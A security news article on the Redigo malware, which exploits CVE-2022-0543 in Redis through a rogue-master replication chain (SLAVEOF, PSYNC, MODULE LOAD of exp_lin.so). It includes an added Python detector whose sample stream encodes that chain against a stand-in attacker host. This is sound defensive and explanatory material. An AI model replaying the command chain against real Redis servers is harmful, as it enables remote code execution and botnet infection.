New Go-based Redigo malware targets Redis servers


Redigo is a new Go-based malware used in attacks against Redis servers affected by the CVE-2022-0543 vulnerability.

Researchers from security firm AquaSec have discovered a new Go-based malware that is being used in a campaign targeting Redis servers. The threat actors exploit a critical vulnerability in Redis (Remote Dictionary Server), tracked as CVE-2022-0543.

Redis (Remote Dictionary Server) is an open-source in-memory database and cache.

The CVE-2022-0543 flaw is a Lua sandbox escape bug that affects Debian and Debian-derived Linux distributions. The vulnerability, rated 10 out of 10 in severity, can be exploited by a remote attacker who is able to execute arbitrary Lua scripts (for example through EVAL) to escape the Lua sandbox and execute arbitrary code on the underlying machine. Juniper Threat Labs researchers reported that the Muhstik botnet had been observed targeting Redis servers by exploiting CVE-2022-0543.

In March 2022, the US Cybersecurity and Infrastructure Security Agency (CISA) added this bug to its Known Exploited Vulnerabilities Catalog.

The bug was fixed in February 2022, but threat actors continue to exploit it in attacks in the wild because proof-of-concept exploit code is publicly available.

The attack chain begins with scans for Redis servers that expose port 6379 to the Internet. The attackers then try to connect (the chain below works only where no authentication stands in the way) and run the following Redis commands:

  1. INFO command – This command allows the adversaries to obtain information about our Redis server. From the information they receive, they now know that the server version is vulnerable to CVE-2022-0543 (as we explained earlier, the honeypot was deliberately created with this vulnerability). This information gives the adversaries the confidence they need to exploit the vulnerability and lets them start preparing the ground for its exploitation.
  2. SLAVEOF command – This allows the adversaries to turn the targeted server into a replica of the attacking server. This action will later help them deliver the shared object that allows the vulnerability to be exploited.
  3. REPLCONF command – This command is used to configure the connection from the master server (the attacking server) to the replica just created.
  4. PSYNC command – The new replica runs this command and starts the replication stream from the master. This connection keeps the replica up to date and allows the master to send a stream of commands. The attacking server, identified as the master server, uses this connection to download the shared library exp_lin.so to the replica's disk. Moreover, this connection can be used by the adversaries as a backdoor: if the connection is interrupted, the replica reconnects and tries to obtain the part of the command stream that was lost during the disconnect.
  5. MODULE LOAD command – This loads, at runtime, the dynamic library downloaded in step 4 as a Redis module. This library allows the adversaries to exploit the vulnerability and run arbitrary commands later.
  6. SLAVEOF NO ONE command – This turns off replication and turns the vulnerable Redis server back into a master server.
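The command sequence above is visible on the wire from the victim's side, which makes it a useful detection. The following Python is an added example, not code from AquaSec, from Redis, or from the Redigo malware: it implements a minimal RESP (Redis serialization protocol) encoder and parser, builds the inbound attacker-to-victim commands of steps 1, 2, 5 and 6 (REPLCONF and PSYNC in steps 3 and 4 are sent by the victim to the rogue master, so they never appear in the inbound client stream), and scans the parsed stream for the pattern: SLAVEOF/REPLICAOF pointing at a non-private address, followed by MODULE LOAD, followed by SLAVEOF NO ONE. The attacker address 203.0.113.10, the port 6379 on the attacking host, the module path /tmp/exp_lin.so and the list of "internal" networks are constructed assumptions of the example.

```python
"""Added example: parse a RESP client stream and flag the rogue-master chain.

Not part of the AquaSec report, of Redis, or of the Redigo malware. The
attacker address, port, module path and internal-network list are constructed.
"""
import ipaddress
from typing import List, Optional

# Ranges a replication master would legitimately live in for this example.
# Anything outside them, or a bare hostname, is treated as an untrusted master.
INTERNAL_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")
]


def encode_command(*args: str) -> bytes:
    """Encode one command as a RESP array of bulk strings (what redis-cli sends)."""
    out = b"*%d\r\n" % len(args)
    for arg in args:
        raw = arg.encode()
        out += b"$%d\r\n%s\r\n" % (len(raw), raw)
    return out


def parse_commands(stream: bytes) -> List[List[str]]:
    """Split a client-to-server RESP stream into commands (lists of arguments)."""
    commands: List[List[str]] = []
    pos = 0
    while pos < len(stream):
        if stream[pos:pos + 1] != b"*":
            raise ValueError("expected RESP array at offset %d" % pos)
        end = stream.index(b"\r\n", pos)
        count = int(stream[pos + 1:end])
        pos = end + 2
        args: List[str] = []
        for _ in range(count):
            if stream[pos:pos + 1] != b"$":
                raise ValueError("expected bulk string at offset %d" % pos)
            end = stream.index(b"\r\n", pos)
            length = int(stream[pos + 1:end])
            pos = end + 2
            args.append(stream[pos:pos + length].decode())
            pos += length + 2  # skip the payload and its trailing CRLF
        commands.append(args)
    return commands


def is_internal(host: str) -> bool:
    """True only for literal IPs inside INTERNAL_NETS; hostnames count as external."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def detect_rogue_master(commands: List[List[str]]) -> List[str]:
    """Return findings for SLAVEOF <external> ... MODULE LOAD ... SLAVEOF NO ONE."""
    findings: List[str] = []
    external_master: Optional[str] = None
    for cmd in commands:
        if not cmd:
            continue
        name = cmd[0].upper()
        if name in ("SLAVEOF", "REPLICAOF") and len(cmd) == 3:
            host, port = cmd[1], cmd[2]
            if host.upper() == "NO" and port.upper() == "ONE":
                if external_master is not None:
                    findings.append("replication reset (SLAVEOF NO ONE) after rogue master")
                continue
            if not is_internal(host):
                external_master = f"{host}:{port}"
                findings.append(f"replication pointed at external host {external_master}")
        elif name == "MODULE" and len(cmd) >= 3 and cmd[1].upper() == "LOAD":
            suffix = f" while replicating from {external_master}" if external_master else ""
            findings.append(f"MODULE LOAD {cmd[2]}{suffix}")
    return findings


# Constructed inbound stream reproducing steps 1, 2, 5 and 6 of the chain.
SAMPLE_STREAM = (
    encode_command("INFO")
    + encode_command("SLAVEOF", "203.0.113.10", "6379")
    + encode_command("MODULE", "LOAD", "/tmp/exp_lin.so")
    + encode_command("SLAVEOF", "NO", "ONE")
)

if __name__ == "__main__":
    for finding in detect_rogue_master(parse_commands(SAMPLE_STREAM)):
        print("ALERT:", finding)
```

In practice the input would come from a packet capture of port 6379 or from `redis-cli MONITOR` output rather than a hand-built byte string; the detection logic is the same. A SLAVEOF that points at a private address followed by SLAVEOF NO ONE produces no finding, so a legitimate replica promotion does not trip the rule, while a single MODULE LOAD is always reported because it means native code is being loaded into the server.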

The attackers load the library file exp_lin.so and execute the exploit code for the bug above. The file contains the system.exec command, which allows an attacker to execute arbitrary commands and launch the attack.

“The first use of the command is to obtain information about the CPU architecture. The second use of the command is to download the newly discovered malware, Redigo, from the attacking server. After the malware file is downloaded, the attackers elevate the permissions of the file to execute and run it (for the malware investigation read below),” reads the analysis published by AquaSec.

The threat actors make the malware's connection look like ordinary Redis traffic on port 6379 to avoid detection.

AquaSec researchers believe that the threat actors use the Redigo malware to infect Redis servers and add them to a botnet used to launch distributed denial-of-service (DDoS) attacks, run cryptocurrency miners, or steal data from the servers.

The researchers also provided indicators of compromise (IOCs) for this threat.


Pierluigi Paganini

(Security hacking, redis)
